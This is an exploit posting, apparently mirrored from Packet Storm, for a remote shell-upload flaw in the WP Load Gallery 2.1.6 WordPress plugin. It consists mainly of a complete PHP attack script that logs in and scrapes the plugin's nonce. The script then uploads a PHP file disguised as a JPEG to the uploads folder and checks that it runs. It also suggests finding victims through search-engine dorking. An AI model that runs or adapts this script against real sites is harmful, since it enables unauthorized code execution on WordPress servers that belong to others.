Exploit for WP Load Gallery 2.1.6 Shell Upload

## https://sploitus.com/exploit?id=PACKETSTORM:189550
=============================================================================================================================================
    | # Title     : WP Load Gallery plugin v2.1.6 Code Injection Vulnerability                                                                  |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://wphive.com/plugins/wp-load-gallery/                                                                                 |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] vulnerability found in WP Load Gallery plugin version 2.1.6 & suffers from a remote shell upload vulnerability.
    
    [+] save code as poc.php .
    
    [+] USage : cmd => c:\www\test\php poc.php -u <URL> -un <USERNAME> -p <PASSWORD>
    
    [+] PayLoad :
    
    <?php
    // تحسين كود الاختبار الأمني - بيئة محلية فقط
    $target_url = $argv[1] ?? '';
    $username = $argv[2] ?? '';
    $password = $argv[3] ?? '';
    
    if (!$target_url || !$username || !$password) {
        die("Usage: php script.php <url> <username> <password>\n");
    }
    
    $target_url = rtrim($target_url, '/');
    $login_url = "$target_url/wp-login.php";
    $gallery_url = "$target_url/wp-admin/admin.php?page=wp-load-gallery";
    $ajax_url = "$target_url/wp-admin/admin-ajax.php";
    $shell_filename = "indoushka.php";
    $shell_path = "$target_url/wp-content/uploads/2025/02/$shell_filename";
    $shell_content = "<?php echo 'Hello, Security Test!'; ?>";
    $user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0";
    
    // التحقق من وجود الإضافة
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "$target_url/wp-content/plugins/wp-load-gallery/");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    if ($http_code !== 200) {
        die("[!] WP Load Gallery غير مثبت أو غير مفعل.\n");
    }
    
    // إنشاء ملف الحمولة
    file_put_contents($shell_filename, $shell_content);
    
    // تسجيل الدخول
    $login_data = [
        "log" => $username,
        "pwd" => $password,
        "rememberme" => "forever",
        "wp-submit" => "Log In"
    ];
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $login_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
    curl_setopt($ch, CURLOPT_COOKIEJAR, "cookies.txt");
    curl_setopt($ch, CURLOPT_COOKIEFILE, "cookies.txt");
    curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
    $response = curl_exec($ch);
    curl_close($ch);
    
    if (!strpos($response, 'dashboard')) {
        die("[!] فشل تسجيل الدخول.\n");
    }
    
    echo "[+] تسجيل الدخول ناجح.\n";
    
    // استخراج wplg_nonce
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $gallery_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_COOKIEFILE, "cookies.txt");
    curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
    $response = curl_exec($ch);
    curl_close($ch);
    
    if (preg_match('/"wplg_nonce"\s*value="(\w+)"/', $response, $matches)) {
        $wplg_nonce = $matches[1];
        echo "[+] تم استخراج wplg_nonce: $wplg_nonce\n";
    } else {
        die("[!] فشل استخراج wplg_nonce.\n");
    }
    
    // رفع الملف
    $upload_data = [
        "wplg_nonce" => $wplg_nonce,
        "action" => "wpgallery",
        "wplg_gallery_id" => "205",
        "task" => "wplg_upload",
        "wplg_gallery_file[]" => new CURLFile($shell_filename, "image/jpeg", $shell_filename)
    ];
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $ajax_url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $upload_data);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_COOKIEFILE, "cookies.txt");
    curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
    $response = curl_exec($ch);
    curl_close($ch);
    
    if (strpos($response, 'status') !== false) {
        echo "[+] تم رفع الملف بنجاح!\n";
        echo "[+] التحقق من وجود الملف على: $shell_path\n";
    
        // التحقق من نجاح الرفع
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $shell_path);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
        $response = curl_exec($ch);
        curl_close($ch);
    
        if (strpos($response, 'Hello, Security Test!') !== false) {
            echo "[+] تم رفع الملف بنجاح وهو يعمل!\n";
        } else {
            echo "[!] الملف غير موجود أو لم يعمل كما هو متوقع.\n";
        }
    } else {
        echo "[!] فشل رفع الملف، الرجاء التحقق يدويًا.\n";
    }
    ?>
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================